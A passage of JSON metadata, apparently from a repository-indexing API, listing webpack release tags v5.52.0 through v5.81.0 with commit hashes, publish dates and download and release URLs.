ebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack